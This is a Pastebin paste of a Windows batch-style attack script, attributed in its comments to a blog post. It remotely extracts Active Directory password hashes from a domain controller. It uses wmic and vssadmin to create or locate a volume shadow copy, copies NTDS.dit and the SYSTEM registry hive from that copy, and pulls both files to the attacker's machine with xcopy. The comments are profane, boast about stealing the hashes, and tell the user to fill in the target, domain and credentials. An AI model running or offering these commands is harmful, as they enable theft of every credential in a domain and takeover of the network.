Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # mostly entirely stolen from http://www.room362.com/blog/2013/06/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/
- # IIGHT UP IN THIS SHIT
- # WE GONNA YANK OUT SOME MUTHAFUNKIN HASHES N SHIT (liek all of AD amirite)
- # REPLACE ALL DIS SHIT WIT YO SHIT
- # TARGETDC
- # DOMAIN
- # USER
- # PASSWORD
- # FIND AND REPLACE ALL BITCH
- net use \\TARGETDC /user:DOMAIN\USER PASSWORD
- wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c vssadmin list shadows 2>&1 > C:\reboot.s246672.log"
- type \\TARGETDC\C$\reboot.s246672.log
- # LOOK AT THAT OUTPUT
- # IF THERE ARE SHADOW COPIES
- # LOOK FOR THE ONE FOR DRIVE C
- # YOU WILL SEE SOME SHIT LIKE "HarddiskVolumeShadowCopy10"
- # THE NUMBER AT THE END WILL BE DIFFERENT
- # REMEMBER THAT FUCKING NUMBER
- # FUCK
- # IF THERE ARE NO SHADOW COPIES
- # keep fuckin' truckin'
- # IF SHADOW COPIES EXIST GOTO FUCKING_SHIT_NIKKCKELS
- # MAKE SOME FUCKING SHADOWS
- # ONLY PROPER SERVERS CAN RUN VSSADMIN CREATE SHADOW
- wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\shutdown.s57345.log"
- type \\TARGETDC\C$\shutdown.s57345.log
- wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c vssadmin list shadows 2>&1 > C:\reboot.s246672.log"
- type \\TARGETDC\C$\reboot.s246672.log
- # LOOK FOR THE ONE FOR DRIVE C
- # YOU WILL SEE SOME SHIT LIKE "HarddiskVolumeShadowCopy10" SOMEWHERE
- # THE NUMBER AT THE END WILL BE DIFFERENT
- # REMEMBER THAT FUCKING NUMBER
- # FUCK
- # FUCKING_SHIT_NIKKCKELS
- # DONT JUST FUCKING RUN THIS COMMAND YOU EAGER FUCK
- # REMEBER THAT FUCKING NUMER?
- # NOW YOU FUCKING NEED IT
- # CHANGE HarddiskVolumeShadowCopy10 TO WHATEVER THE FUCK IT WAS
- wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows\System32\config\SYSTEM C:\SYSTEM.hive 2>&1 > C:\update.36234211.log"
- # PAY THE FUCK ATTENTION AND CHANGE "HarddiskVolumeShadowCopy10" FOR THIS COMMAND TOO
- # FUCK
- wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows\NTDS\NTDS.dit C:\NTDS.dit 2>&1 > C:\update.4352.log"
- # NOW STEAL DAT SHIT MOFUCKA
- xcopy \\TARGETDC\C$\SYSTEM.hive .\
- xcopy \\TARGETDC\C$\NTDS.dit .\
- # NOW CLEAN UP YOUR GODDAMN MESS YOU FILTHY MOFUCKA
- # OR NOT
- # FUCK YOU
- # DELETE YOUR SHADOW COPY IF YOU WANT
- # FUCKING FREE BACKUPS BITCH
- # I DONT GIVE A FUCK
- del \\TARGETDC\C$\SYSTEM.hive
- del \\TARGETDC\C$\NTDS.dit
- # ENJOI
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement